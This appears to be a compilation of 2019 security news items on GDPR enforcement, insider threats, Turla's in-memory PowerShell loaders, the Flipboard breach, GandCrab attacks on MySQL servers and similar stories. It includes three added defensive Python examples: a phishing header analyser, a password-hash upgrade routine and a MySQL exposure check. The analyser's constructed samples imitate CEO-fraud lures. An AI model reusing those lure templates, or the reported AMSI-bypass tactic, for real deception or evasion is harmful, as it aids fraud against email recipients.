“The absence of any GDPR fines in 2018 was not surprising, as it takes many months for cases to work through the system, but we know that they are on their way,” he said. “As well as looking at how to improve their levels of legal compliance, I would encourage organizations to focus on how good approaches to the handling of personal data can help them to deliver on their business purpose, to help and sustain the creation of long term value and trust.”

In an email to Infosecurity, Emma Loveday-Hill, senior associate and data protection specialist at Prettys, said that as monetary penalty notices in the last year were issued under the old legislation (the Data Protection Act 1998), where the maximum fine was £500,000, there were still numerous high level fines issued due to the fact that there were a number of serious breaches.

“In terms of the reduction in enforcement notices, this is likely to be due to the fact that the ICO has been busy dealing with the backlog of complaints and issues brought to their attention since the introduction of the GDPR and DPA 2018,” she said.

“Investigations by their very nature take time to carry out, and given the likely number of the complaints and issues raised with the ICO, this has no doubt had an impact on how quickly enforcement notices are handed down.

“Our message is still very much ‘watch this space’ as the ICO are just getting started in terms of what they are doing under the GDPR and Data Protection Act 2018, and going forward we are likely to see a higher number of enforcement notices and fines coming through over the coming months as the ICO makes its goal for 2019 a clear one: breaches of data protection law will be taken seriously and financial penalties will be issued as a result of noncompliance.”

25% of Workers Would Give Away Data for £1000

It's been a year since the implementation of GDPR, and it seems that businesses are as vulnerable as ever. According to a report by nCipher, 71% of the UK C-suite would be willing to cover up a data breach if they could escape the fines, compared with the 57% of managers and directors.

The survey found that while investment in employee training was second to investment in technology, IT leaders still find they lack support from the board and the wider C-suite. This is experienced within midsized companies (250–999 employees). 

Peter Galvin, chief strategy and marketing officer, nCipher Security, said, “Organizations are under a greater obligation than ever to disclose data breaches, particularly when personal information is at risk, but evidently many IT leaders – particularly at C-Level – still feel they can avoid being subject to fines and other punitive measures from regulatory bodies.”

However, it's not just the C-suite that is putting businesses at risk. According to a report by Deep Secure, almost half of office employees would be willing to sell corporate information to people outside their organization. In a company announcement, the company said that "£1,000 would be enough to tempt 25% of employees to give away company information." Shockingly, 5% would give it away for free.

The What Is the Price of Loyalty Report reveals how 10% of respondents would also sell intellectual property, such as product specifications, product code and patents, for £250 or less. The findings also revealed that one in five (19%) of respondents in graduate-level roles admitted that they were paid to source the information, with 29% of 16–24-year-olds reporting they had been approached by someone they didn’t know to take it.

Dan Turner, CEO of Deep Secure, commented, “The cost of employee loyalty is staggeringly low. With nearly half of all office workers admitting that they would sell their company's and clients’ most sensitive and valuable information, the business risk is not only undisputable but immense in the age of GDPR and where customers no longer tolerate data breaches. 

“Given the prevalent use of digital and cyber tactics to exfiltrate this information, it’s critical that businesses invest in a security posture that will help them both detect and prevent company information from leaving the network,” he said.

ESET Exposes Turla Malware Attacks on European Diplomats

Turla, an infamous advanced persistent threat (APT) group, is using new PowerShell-based tools that provide direct, in-memory loading and execution of malware, executables and libraries. Researchers at ESET detected several attacks against diplomatic entities in Eastern Europe using PowerShell scripts, linking them to the group.

Turla is believed to have been operating since at least 2008 when it successfully breached the U.S. military. It has also been involved in major attacks against many government entities in Europe and the Middle East – among them the German Foreign Office and the French military. The group is also known as Snake or Uroburos. 

According to Malwarebytes Labs, Turla uses what is thought to be Russian governmental malware. It has infected Linux and Mac operating systems but is mostly associated with infecting Windows systems. 

The PowerShell-based tools can bypass detection techniques that are triggered when a malicious executable is dropped on a disk, which ESET researcher Matthieu Faou believes are being used globally against "other traditional Turla targets." 

The PowerShell loaders, detected by ESET under the umbrella name PowerShell/Turla, differ from simple droppers in that they persist on the system and load the embedded executables directly into memory rather than writing them to disk. In some samples, Turla developers modified their PowerShell scripts to bypass the Antimalware Scan Interface (AMSI), leaving the antimalware product unable to receive the script content from AMSI for scanning.

“Along with Turla’s new PowerShell loader, we’ve discovered and analyzed several interesting payloads, including an RPC-based backdoor and a PowerShell backdoor leveraging Microsoft’s cloud storage service, OneDrive, as its command-and-control [C&C] server,” said Faou. “However, these techniques do not prevent the detection of the actual malicious payloads in memory."

One of the payloads ESET discovered is a whole set of backdoors relying on the RPC protocol, which are used to perform lateral movement and take control of other machines on the local network without relying on an external C&C server. 

“We believe this backdoor is a recovery access tool in case the main Turla backdoors are removed and operators can no longer access the compromised computers,” said Faou.

Impersonation Phishing Attacks Up 67% in Last 12 Months

Mimecast has released its third annual State of Email Security Report and has found that phishing attacks have lost companies money, data and customers. Including insights from 1,025 global IT decision-makers, the report found that social engineering attacks were on the rise.

According to the study, phishing attacks were the most prominent type of cyber-attack, with 94% of respondents having experienced phishing and spear-phishing attacks in the previous 12 months. Over half (55%) cited seeing an increase in that same period.  

Most notably, the report found that impersonation attacks increased by over two-thirds (67%), with 73% of organizations impacted by impersonation attacks having experienced a direct loss. Specifically, 28% of businesses lost customers, 29% suffered financially and 40% lost data.

This surge has meant that people within organizations are losing confidence in their security. According to the report, 61% believe it is likely or inevitable their company will suffer a negative business impact from an email-borne attack this year. 

“Email security systems are the frontline defense for most attacks. Yet just having and providing data on these attacks is not what creates value for most respondents,” says Josh Douglas, vice president of threat intelligence at Mimecast. “Survey results indicate that vendors need to be able to provide actionable intelligence out of the mass of data they collect and not just focus on indicators of compromise which would only address past problems."

According to the company's announcement on the findings, the top five industries being impacted by impersonation attacks are financial, manufacturing, professional services, science/technology and transportation. 

Other interesting statistics include: 

  • Ransomware attacks are up 26% in comparison to last year.
  • Nearly 50% of respondents noted having downtime for two to three days.
  • Just under a third experienced downtime for four to five days.
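
Impersonation attacks of the kind the report counts mostly rest on three header-level tricks: a trusted display name on an untrusted address, a domain one character away from the real one, and a Reply-To that diverts the conversation elsewhere. The following is an added example, not Mimecast's product logic: a small header analyser that flags those three patterns, run over a handful of constructed sample messages. The internal domain, the VIP roster and every address in the samples are assumptions made up for the example.

```python
"""Added example (not Mimecast's product logic): flag the display-name and
domain impersonation patterns behind most impersonation phishing, run over
constructed sample messages. The VIP roster and domains are assumptions."""
import email
import re
from email import policy
from email.utils import parseaddr

INTERNAL_DOMAINS = {"example.com"}  # constructed
VIP_ADDRESSES = {                    # constructed roster of frequently spoofed names
    "jane doe": "jane.doe@example.com",
    "tom chen": "tom.chen@example.com",
}

# Constructed sample messages (headers are what matter to these checks).
SAMPLE_MESSAGES = {
    "vip_freemail": 'From: "Jane Doe" <jane.doe@gmail-mail.com>\nTo: ap@example.com\nSubject: Urgent wire\n\nPlease process today.\n',
    "legit": 'From: "Jane Doe" <jane.doe@example.com>\nTo: ap@example.com\nSubject: Q3 budget\n\nAttached.\n',
    "lookalike": 'From: "Accounts Payable" <ap@examp1e.com>\nTo: vendor@partner.test\nSubject: New bank details\n\nPlease update.\n',
    "replyto": 'From: "Tom Chen" <tom.chen@example.com>\nReply-To: tomchen.ceo@outlook.com\nTo: staff@example.com\nSubject: Gift cards\n\nCall me.\n',
}


def normalize_name(name: str) -> str:
    """Lower-case, strip punctuation and collapse spaces so 'Jane  Doe.' == 'jane doe'."""
    return " ".join(re.sub(r"[^a-z ]", "", name.lower()).split())


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to spot one-character lookalike domains."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def analyze(raw: str) -> list:
    """Return a list of human-readable findings for one RFC 822 message."""
    msg = email.message_from_string(raw, policy=policy.default)
    display, addr = parseaddr(str(msg.get("From", "")))
    addr = addr.lower()
    domain = addr.rsplit("@", 1)[-1] if "@" in addr else ""
    findings = []

    # 1. Display name matches a VIP but the address is not that VIP's.
    expected = VIP_ADDRESSES.get(normalize_name(display))
    if expected and addr != expected:
        findings.append(f"display name '{display}' matches VIP but sender is {addr}")

    # 2. Sender domain is one edit away from an internal domain (e.g. examp1e.com).
    if domain and domain not in INTERNAL_DOMAINS:
        for internal in INTERNAL_DOMAINS:
            if edit_distance(domain, internal) <= 1:
                findings.append(f"sender domain {domain} is a lookalike of {internal}")

    # 3. Reply-To points somewhere other than the From domain: replies are diverted.
    _, reply_addr = parseaddr(str(msg.get("Reply-To", "")))
    reply_domain = reply_addr.lower().rsplit("@", 1)[-1] if "@" in reply_addr else ""
    if reply_domain and reply_domain != domain:
        findings.append(f"Reply-To domain {reply_domain} differs from From domain {domain}")
    return findings


def analyze_all(messages: dict) -> dict:
    """Map each sample label to its findings."""
    return {label: analyze(raw) for label, raw in messages.items()}


if __name__ == "__main__":
    for label, findings in analyze_all(SAMPLE_MESSAGES).items():
        print(label, "->", findings or "clean")
```

These checks are deliberately cheap so they can sit in front of a mail flow; the display-name rule in particular is where most of the "CEO fraud" variants the report describes fall over, because the attacker controls the name but not the VIP's real address.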

Pro-Iran Campaign Spread Fake News During Mid-Terms

Security researchers have uncovered a major new state-sponsored Iranian influence campaign using dozens of fake news sites and hundreds of spoofed social media accounts in an attempt to manipulate public opinion.

Most of the accounts in question were created between April 2018 and March 2019 and used to spread inauthentic content from sites such as Liberty Front Press (LFP), US Journal, and Real Progressive Front during the US mid-terms, according to FireEye.

Some included profile pics lifted from social media users with the same name, and some described themselves as activists, correspondents, or “free journalist” in their profile.

Others even impersonated US political candidates, such as Republicans Marla Livengood and Jineea Butler. In those cases, those behind the accounts plagiarized some of the candidates' legitimate tweets and then added pro-Iranian content.

The content promoted by these accounts was overwhelmingly pro-Iranian, pro-Palestinian, anti-Saudi and anti-Israeli. However, a small percentage of messages were anti-Iran, possibly to lend the accounts legitimacy and/or to draw in those with opposing views who could then be targeted with messages in support of the Islamic Republic.

Interestingly, the campaign appears to have extended to legitimate print and online media sources via guest columns, letters and blog posts republished on these platforms. In some cases, the text for separate articles penned by 'different' individuals was almost identical, or had the same narrative. Most appeared in small local US news outlets.

FireEye said the content was in line with “Iranian political interests in a manner similar to accounts that we have previously assessed to be of Iranian origin.” However, definitive attribution is difficult, especially as most of the accounts have now been suspended.

“Apart from the narratives and messaging promoted, we observed several limited indicators that the network was operated by Iranian actors. For example, one account in the network, @AlexRyanNY, created in 2010, had only two visible tweets prior to 2017, one of which, from 2011, was in Persian and of a personal nature,” FireEye continued.

“Subsequently in 2017, @AlexRyanNY claimed in a tweet to be ‘an Iranian who supported Hillary’ in a tweet directed at a Democratic political strategist. This account, using the display name ‘Alex Ryan’ and claiming to be a Newsday correspondent, appropriated the photograph of a genuine individual also with the first name of Alex.”

In addition, while most accounts in this network had their language set to English, one was set to Persian, the vendor revealed.

Flipboard Breached in Nine-Month Raid

Flipboard has reset all customer passwords as a precaution after revealing that hackers had unauthorized access to user data for over nine months.

The news aggregator site, which has around 150 million monthly users, said the “unauthorized person” gained access to “certain Flipboard users’ account information,” although it didn’t reveal how many were affected.

“Findings from the investigation indicate an unauthorized person accessed and potentially obtained copies of certain databases containing Flipboard user information between June 2, 2018 and March 23, 2019 and April 21 – 22, 2019,” it said in a statement.

“The databases involved contained some of our users’ account information, including name, Flipboard username, cryptographically protected password and email address.”

The good news is that Flipboard protected passwords with salted hashing, making it harder but not impossible for attackers to crack them. However, credentials created or changed before March 14, 2012 were only salted and hashed with SHA-1, a fast general-purpose hash that is far weaker against offline cracking than bcrypt, which Flipboard uses for newer credentials.
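
The split Flipboard describes, older records on a fast hash and newer ones on a slow one, is the normal outcome of changing algorithms without a forced reset, because the plaintext needed to recompute a hash is only available when the user logs in. The following is an added example, not Flipboard's code, of the upgrade-on-login pattern that closes that gap: a legacy salted SHA-1 record is verified, and on success replaced with a slow salted hash. PBKDF2-HMAC-SHA256 from the standard library stands in for bcrypt, and the two record formats are constructed for this example.

```python
"""Added example (not Flipboard's code): verify a stored password hash and, when
the record uses the legacy fast scheme, transparently upgrade it to a slow
hash on the next successful login. PBKDF2-HMAC-SHA256 from the standard
library stands in for bcrypt; the record formats are constructed here."""
import hashlib
import hmac
import os
from typing import Optional, Tuple

# OWASP's current guidance for PBKDF2-HMAC-SHA256 is 600,000 iterations.
PBKDF2_ITERATIONS = 600_000

# Assumed record formats (constructed for this example):
#   sha1$<salt_hex>$<digest_hex>                         legacy: one SHA-1 pass over salt||password
#   pbkdf2_sha256$<iterations>$<salt_hex>$<digest_hex>   slow hash


def hash_legacy_sha1(password: str, salt: bytes) -> str:
    """Pre-2012 style record: salted, but computed with a single fast hash."""
    digest = hashlib.sha1(salt + password.encode("utf-8")).hexdigest()
    return f"sha1${salt.hex()}${digest}"


def hash_slow(password: str, salt: Optional[bytes] = None,
              iterations: int = PBKDF2_ITERATIONS) -> str:
    """Slow, salted hash; every guess costs the attacker `iterations` HMAC calls."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations).hex()
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest}"


def needs_rehash(record: str) -> bool:
    """True for legacy records and for slow-hash records below the current work factor."""
    parts = record.split("$")
    if parts[0] == "sha1":
        return True
    if parts[0] == "pbkdf2_sha256":
        return int(parts[1]) < PBKDF2_ITERATIONS
    raise ValueError("unknown record format")


def verify(record: str, password: str) -> bool:
    """Recompute the record from the candidate password and compare in constant time."""
    parts = record.split("$")
    if parts[0] == "sha1":
        candidate = hash_legacy_sha1(password, bytes.fromhex(parts[1]))
    elif parts[0] == "pbkdf2_sha256":
        candidate = hash_slow(password, bytes.fromhex(parts[2]), int(parts[1]))
    else:
        raise ValueError("unknown record format")
    return hmac.compare_digest(candidate.encode(), record.encode())


def login(record: str, password: str) -> Tuple[bool, str]:
    """Authenticate and return the record the store should hold from now on.

    The plaintext is only in hand at login, so this is the one moment a legacy
    hash can be replaced without forcing the user through a reset."""
    if not verify(record, password):
        return False, record
    if needs_rehash(record):
        return True, hash_slow(password)
    return True, record


if __name__ == "__main__":
    legacy = hash_legacy_sha1("correct horse battery", os.urandom(16))
    ok, upgraded = login(legacy, "correct horse battery")
    print(ok, upgraded.split("$")[0])
```

Because `needs_rehash` also returns true when a slow record's iteration count falls below the current setting, the same login path raises the work factor over time; accounts that never log in keep their old hash, which is exactly the population a breach of this kind puts most at risk and the reason Flipboard chose a blanket reset.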

“Additionally, if users connected their Flipboard account to a third-party account, including social media accounts, then the databases may have contained digital tokens used to connect their Flipboard account to that third-party account,” the firm added.

“We have not found any evidence the unauthorized person accessed third-party account(s) connected to users’ Flipboard accounts. As a precaution, we have replaced or deleted all digital tokens.”

No financial information or Social Security numbers were affected by the breach, and the firm claimed to have “enhanced” its security following the incident.

Although it followed best practices regarding user passwords, the fact that hackers managed to stay hidden for nine months will be of concern to users.

Huawei Files New Motion Against Federal Ban

Huawei has filed a new motion in its case to have a federal ban on its equipment declared unconstitutional, as the firm continues its PR offensive.

The Shenzhen giant filed for a “summary judgement” as part of a case launched in March to challenge the constitutionality of Section 889 of the 2019 National Defense Authorization Act (2019 NDAA).

That law explicitly bans government agencies from doing business with Huawei or other third parties that use its kit.

The new motion will look to speed up the judgement process without the need for a full trial, which experts reportedly say may also be a tactical move designed to avoid the firm having to hand over sensitive company documents as part of legal discovery.

“The U.S. government has provided no evidence to show that Huawei is a security threat. There is no gun, no smoke. Only speculation,” Huawei chief legal officer, Song Liuping, said in a statement.

“The judicial system is the last line of defense for justice. Huawei has confidence in the independence and integrity of the U.S. judicial system. We hope that mistakes in the NDAA can be corrected by the court.”

The federal ban is just one of a series of recent legal moves designed to shut Huawei out from the US market and impact its ability to operate freely.

Most recently, a Presidential executive order issued earlier this month effectively extended the ban to all US companies, although it did not explicitly name Huawei or China.

The same day, the Commerce Department added the firm to its Entity List, which means US firms that sell it key components such as chips must stop doing so once a temporary license expires in around 90 days.

A hearing on the new motion is set for September 19.

Cryptopia Fights to Keep Data Held by Arizona Firm

Cryptopia, an exchange that was hacked and subsequently went into liquidation in May, has filed for bankruptcy protection in the United States. Grant Thornton, the liquidator, will handle the preservation of data stored and hosted on servers run by an Arizona-based firm, according to Yahoo News.

The bankruptcy court in the Southern District of New York issued an order to Cryptopia on Friday, granting an emergency motion for provisional relief until June 7. However, the Arizona company that runs the servers has severed ties with the exchange and is demanding payment of $2 million, according to Bloomberg. If Cryptopia does not pay, the data could be overwritten or lost.

The New Zealand–based exchange operated with 300,000 accounts from across the globe. It filed for U.S. bankruptcy protection after hackers stole over $16 million earlier this year. Bloomberg reports that every account holder is a potential creditor in the liquidation, with trade creditors owed about $2.6 million. 

“The interim order preserves the Cryptopia data, which includes a SQL database containing all account holders’ individual holdings of cryptocurrencies and the account holder contact details," said Grant Thornton. "Without this information, reconciling individual holdings with the currencies held by Cryptopia will be impossible.”

On its website, Cryptopia said, "On Friday 24 May 2019, we filed a petition in the Bankruptcy Court in the Southern District of New York (SDNY) seeking recognition of the New Zealand liquidation in the USA, and we also applied for urgent interim relief. We took these steps to preserve the Cryptopia information that is stored and hosted on servers with an Arizona based business.

"Our objective is to protect and to preserve those holdings for the benefit of those entitled to them. We expect that the process of recovering data and determining how to make distributions to account holders will take some months at least. 

"We understand that this delay will be frustrating for account holders. For that reason, we are working to resolve these issues as soon as reasonably practicable."

All trading on the Cryptopia exchange has been suspended, meaning that users cannot deposit or withdraw crypto assets.

Germany Seeks Access to Encrypted Messages on WhatsApp, Telegram

Germany's federal interior minister, Horst Seehofer, wants companies such as WhatsApp and Telegram to give security authorities access to end-to-end encrypted messages or calls. Not complying with this could end with companies being banned by the Federal Network Agency. 

The latest issue of Der Spiegel reports that Seehofer wants the order implemented quickly, particularly because the move to 5G could cause "complications" for security authorities. The report comes shortly after WhatsApp patched a remote code execution (RCE) vulnerability in its app that may have been exploited by a nation-state actor.

As Infosecurity reported at the time, the Facebook-owned messaging giant, which has 1.5 billion users, rolled out a fix for the vulnerability, which allowed an attacker to install spyware on a target's device simply by calling it.

5G itself has also been a controversial topic recently, with an FBI agent warning that the technology would lead to "an explosion in cybersecurity risks." Experts in Europe have also called for 5G to be provided with end-to-end encryption.

Additionally, Germany has already clashed with WhatsApp's parent company, Facebook, this year. Its antitrust watchdog, the Federal Cartel Office, barred the company from combining data collected outside its social network with users' Facebook accounts without their consent, according to Forbes.

Andreas Mundt, president of the Federal Cartel Office, said, "Facebook will no longer be allowed to force its users to agree to the practically unrestricted collection and assigning of non-Facebook data to their Facebook user accounts."

Fredericton, New Brunswick, Makes Its Cybersecurity Bulletproof

The city of Fredericton, New Brunswick, has agreed to pay C$100,000 (almost $75,000) to cybersecurity company Bulletproof Solutions to strengthen its network and protect it from cyber-attacks. The three-year agreement was approved at the city council meeting on Monday, May 27, 2019.

The city's assistant director of finance, innovation and technology, Adam Bell, believes the move will help protect against the rise in attacks on municipalities. It follows an April cyber-attack on the city of Stratford, Ontario, which took down the city's email system and online forms.

According to Akamai and the Canadian Internet Registration Authority's (CIRA) Fall 2018 Cybersecurity Report, 40 percent of respondents experienced a cyber-attack in the previous 12 months, rising to 66 percent among large businesses. Fredericton joins the roughly two-thirds of Canadian businesses that outsource part of their cybersecurity function to external vendors.

However, 88 percent of Canadian employees at these companies are concerned about the prospect of future cyber-attacks. Perhaps they are right to be: 37 percent of companies have no anti-malware protection installed, and nearly 75 percent have no formal patching policy, leaving them exposed to known, already-fixed vulnerabilities.

"A key element of building a better online Canada is ensuring Canadians have safe, secure internet access," president and CEO of CIRA, Byron Holland, said. In the introduction of the Akamai report, Holland explains that hackers will be attracted to companies with a lot of personal data, such as a government organization, because they can make money from it on the dark web. 

"Personal information is being sold on the dark web for as little as $5 for a credit card number, $30 for an entire identity, or up to $1,000 for medical records. There are hundreds of examples of low hanging fruit for hackers in everyday interactions Canadians have with businesses every day. All these situations are potential breaches and many businesses don’t even know the risks."

The upgrade was approved the same day Fredericton hosted its hackathon to find internet of things solutions for the city. 

GandCrab Campaign Attacks MySQL Servers

Thousands of organizations running MySQL may have been infected with the infamous GandCrab ransomware after researchers spotted a new campaign targeting the open source database.

Sophos principal researcher Andrew Brandt explained in a blog post that the British security firm spotted the attack via a honeypot set up to monitor port 3306, the default port for MySQL.

The attackers scanned for exposed, unsecured MySQL databases running on Windows servers.

Interestingly, while the IP address of the machine hosting GandCrab geolocated to Arizona, the user interface of the server software (HFS) running on it was set to simplified Chinese, hinting at the origins of the perpetrator.

That server hosted five Windows executables with file names starting “3306,” and also provided useful stats on the campaign so far.

“The server appears to indicate more than 500 downloads of the sample I saw the MySQL honeypot download (3306-1.exe). However, the samples named 3306-2.exe, 3306-3.exe, and 3306-4.exe are identical to that file. Counted together, there have been nearly 800 downloads in the five days since they were placed on this server, as well as more than 2300 downloads of the other (about a week older) GandCrab sample in the open directory,” explained Brandt.

“So while this isn’t an especially massive or widespread attack, it does pose a serious risk to MySQL server admins who have poked a hole through the firewall for port 3306 on their database server to be reachable by the outside world.”

MySQL has a market share of over 50%, putting many organizations at potential risk of a damaging GandCrab infection.
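The practical takeaway from Brandt's warning is to confirm that your own MySQL instance is not reachable on port 3306 from outside. The script below is an added example by the editor, not Sophos's code or anything from the campaign: it parses `ss -ltn` output for wildcard listeners on 3306 and reads `bind-address` from the `[mysqld]` section of my.cnf. The sample `ss` output and my.cnf fragment are constructed for the example. A wildcard bind is a finding to verify rather than proof of exposure, since a host or network firewall may still block the port; conversely, a firewall exception like the one Brandt describes turns it into exactly the hole this campaign scans for.

```python
"""Added example: flag a MySQL instance listening on every interface.

Not Sophos's code; an editor's illustration of the post-report check.
Inputs are constructed `ss -ltn` output and a my.cnf fragment.
"""
from typing import Dict, List, Tuple

MYSQL_PORT = 3306
WILDCARD_ADDRS = {"0.0.0.0", "::", "*"}

# Constructed sample output of `ss -ltn` (not captured from a real host).
SAMPLE_SS = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port
LISTEN  0       128     127.0.0.1:22         0.0.0.0:*
LISTEN  0       80      0.0.0.0:3306         0.0.0.0:*
LISTEN  0       80      [::]:3306            [::]:*
LISTEN  0       511     *:443                *:*
"""

# Constructed my.cnf fragment showing the weak setting.
SAMPLE_CNF = """\
[mysqld]
bind-address = 0.0.0.0   # exposes 3306 on every interface
port = 3306
"""


def parse_listeners(ss_output: str) -> List[Tuple[str, int]]:
    """Return (address, port) pairs for every LISTEN line of `ss -ltn`."""
    listeners = []
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0] != "LISTEN":
            continue
        addr, _, port = fields[3].rpartition(":")  # handles [::]:3306 and *:443
        addr = addr.strip("[]")
        if port.isdigit():
            listeners.append((addr, int(port)))
    return listeners


def exposed_listeners(ss_output: str, port: int = MYSQL_PORT) -> List[str]:
    """Addresses on which `port` is bound to a wildcard (every interface)."""
    return [addr for addr, p in parse_listeners(ss_output)
            if p == port and addr in WILDCARD_ADDRS]


def parse_mysqld_options(cnf_text: str) -> Dict[str, str]:
    """Options in the [mysqld] section; bare flags map to an empty string."""
    opts: Dict[str, str] = {}
    in_mysqld = False
    for raw in cnf_text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments
        if not line:
            continue
        if line.startswith("["):
            in_mysqld = line.lower() == "[mysqld]"
            continue
        if in_mysqld:
            key, _, value = line.partition("=")
            # MySQL accepts bind_address and bind-address interchangeably
            opts[key.strip().replace("_", "-")] = value.strip()
    return opts


def assess(ss_output: str, cnf_text: str) -> List[str]:
    """Human-readable findings; an empty list means nothing looks exposed."""
    findings = [f"mysqld listening on wildcard address {addr}:{MYSQL_PORT}"
                for addr in exposed_listeners(ss_output)]
    opts = parse_mysqld_options(cnf_text)
    if "skip-networking" in opts:
        return findings  # TCP disabled; only the local socket is used
    bind = opts.get("bind-address", "*")  # server default is "*" when unset
    if bind in WILDCARD_ADDRS:
        findings.append(f"my.cnf bind-address={bind}: restrict to 127.0.0.1 "
                        "or an internal interface and firewall 3306")
    return findings


if __name__ == "__main__":
    for finding in assess(SAMPLE_SS, SAMPLE_CNF) or ["no exposure found"]:
        print(finding)
```

On a live host, feed it the real output of `ss -ltn` and the contents of `/etc/mysql/my.cnf` (or wherever the server reads its options from).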

The ransomware has been used in an increasingly targeted manner over recent months, with hackers trying out different threat vectors in a bid to outwit defenses.

In February it was spotted as the payload in a campaign targeting MSPs via a two-year-old flaw in a third-party plug-in for remote management software.

As of March 2018, GandCrab had infected over 50,000 victims and extorted an estimated $300,000-600,000, with over 70% of victims based in the US and UK, according to Check Point.

Aussie Teen Hacked Apple in Hope of Job Offer

An Australian boy who hacked Apple when he was just 13 did so in a misguided attempt to get a job with the tech giant, a court has heard.

The schoolboy, who is now 17, pleaded guilty to multiple cybercrime offenses after hacking Apple in December 2015 and early 2017 and making off with internal data, according to local reports.

His actions were reported to the FBI, which subsequently contacted the Australian Federal Police.

The boy’s lawyer, Mark Twiggs, told Adelaide Youth Court that his client is now very remorseful.

“This offending started when my client was 13 years of age, a very young age. He had no idea about the seriousness of the offence and hoped that when it was discovered that he might gain employment at this company,” he’s reported as saying.

“He didn't know this was going to lead to anything other than a job at the end of it, [this] happened in Europe, a similar person got caught and they ended up getting employed by the company.”

The magistrate appears to have agreed, putting the boy on an AU$500 good behavior bond for nine months.

“He is clearly someone who is a gifted individual when it comes to information technology, that being said, those who have this advantage of being gifted doesn't give them the right to abuse that gift," he said.

“You must remain on the straight and narrow and use your gifts for good rather than evil.”

It’s unclear what data the individual stole from Apple, but the firm’s spokesperson confirmed that the incidents were promptly contained and that no customer information was involved.

Japan to Restrict Foreign Tech Investment on Security Fears

The Japanese government is set to restrict foreign ownership of domestic firms in key tech areas on national security grounds, in a move which echoes America’s recent attempts to restrict Chinese companies.

Announced on Monday, the new rules will add the manufacturing of chips, telecoms equipment, mobile phones and other sectors to already restricted areas like nuclear equipment and arms.

From August 1, foreign companies wanting to buy more than 10% of a Japanese firm in one of 20 IT-related sectors will need prior approval from the government, according to updates to the foreign exchange and foreign trade control law.

“The importance of securing cybersecurity has been increasing in recent years for the industry pertaining to specific acquisitions … that require prior notification based on the provision of Article 28 paragraph 1 of the Act,” the government noted.

“In view of the appropriate prevention of situations that may seriously affect Japan's security, such as the outflow of technology important for security and the loss of Japan's defense production and technology base, integrated circuit manufacturing industry, etc. we decided to take necessary measures.”

Although China is not named specifically, the order was issued as Prime Minister Shinzo Abe discussed trade with Donald Trump yesterday.

It could be viewed as aligning Japan with the tough stance taken by Washington on Chinese businesses, which it argues are a national security risk and unfairly subsidized by Beijing.

In China, strict laws force foreign investors to partner with local companies if they want to enter its vast, lucrative market. This has led to accusations of forced technology transfers to domestic firms, ultimately enabling the country and its hi-tech champions to catch up with their Western rivals.

Earlier this month, a Presidential Executive Order effectively banned foreign companies deemed a national security threat from competing in the US market. A separate Entity List will prevent US firms from selling key components to Huawei once a temporary license expires in around 90 days.

Snapchat: Claims of Employees Spying “Inaccurate”

In response to news that multiple Snapchat employees abused their privileged access to spy on users, reported by Motherboard, the social media platform said the allegations are false.

“Two former employees said multiple Snap employees abused their access to Snapchat user data several years ago. Those sources, as well as an additional two former employees, a current employee, and a cache of internal company emails obtained by Motherboard, described internal tools that allowed Snap employees at the time to access user data, including in some cases location information, their own saved Snaps and personal information such as phone numbers and email addresses,” Motherboard wrote on May 23.

Whether accurate or not, "the incident highlights the risks posed by insider threats. Most of the employees are busy doing their day-to-day jobs but a handful have malicious intent thus causing harm to the organizations they work for,” said Mayank Choudhary, senior vice president at ObserveIT.

“As in the case of Snapchat where a few users with elevated access were able to take their own and consumers’ data easily. Existing security controls did not pick this up, given most of the technology is focused on protecting the company from external threats. It’s high time that organizations focus on insider threats with platforms that help customers know the whole story, protect IP quickly, easily and reliably.”

However, the Motherboard report states that how any access might have been abused, and which system was used, remains unknown. While noting that the alleged spying happened 'several years ago,' the story does say that one internal tool, SnapLion, is capable of accessing user data, according to multiple anonymous sources.

“Any perception that employees might be spying on our community is highly troubling and wholly inaccurate,” a Snapchat spokesperson wrote in an email to Infosecurity.

“Protecting privacy is paramount at Snap. We keep very little user data, and we have robust policies and controls to limit internal access to the data we do have, including data within tools designed to support law enforcement. Unauthorized access of any kind is a clear violation of the company's standards of business conduct and, if detected, results in immediate termination.”

Moody’s Downgrading of Equifax Is a Message to Boards

While affirming Equifax’s senior unsecured rating at Baa1 and its short-term rating at Prime-2, Moody’s Investors Service revised the company’s outlook from stable to negative, citing the 2017 cyber-attack.

“The outlook revision to negative reflects weaker operating performance and credit metrics than originally expected following the cybersecurity breach in 2017,” the May 17 rating action notice stated.

"Free cash flow may remain around only $150 million per year for a few years, or less than half of annual free cash flow prior to the breach," said Edmond DeForest, Moody's vice president and senior credit officer. "Diminished free cash flow limits Equifax's ability to reduce its financial leverage," he continued.

Infosecurity Magazine reached out to Equifax for comment in reaction to the news that was reported May 23 by CNBC. An Equifax spokesperson wrote in an email, “Moody’s affirmed our Baa1 senior unsecured rating and the short-term rating at Prime-2. Any questions about the outlook change should be directed to Moody’s. EFX remains solidly investment grade and the revision in Moody’s outlook will not impact our internal investments, including new products, our $1.25bn EFX2020 technology and security advancements, or future acquisitions.”

According to CNBC, a Moody’s spokesperson said the downgrade is significant because “it is the first time that cyber has been a named factor in an outlook change.”

The news isn’t all that surprising to industry experts who have long been saying that cybersecurity is a boardroom issue. “Everyone is in business with a single goal, which is to make money. This includes the bad guys, except that they want to make their money by preventing someone else from doing the same,” said Laurence Pitt, strategic security director, Juniper Networks.

Because cyber-risk is integral to business risk, boards will likely see this downgrade as a clear message in a language they can understand, said Steve Durbin, managing director of the Information Security Forum.

“For quite some time, I have been encouraging both the insurance industry and credit rating agencies to take cyber risk into account when setting policy pricing and assessing company value. Moving forward, this should become the norm since cyber-risk is so integral to business risk that an assessment of business health without taking cyber risk and a company’s resilience into account will become meaningless. For the cybersecurity industry, this supports what many have been advocating for some time – that cyber is a business issue and must be taken seriously by boards.”

APT Increasingly Targets Canadian Orgs

Canadian organizations are being warned that they are increasingly becoming the targets of cyber-threats, with researchers discovering nearly 100 malicious email campaigns that have been specifically targeting Canadian audiences, according to new research from Proofpoint.

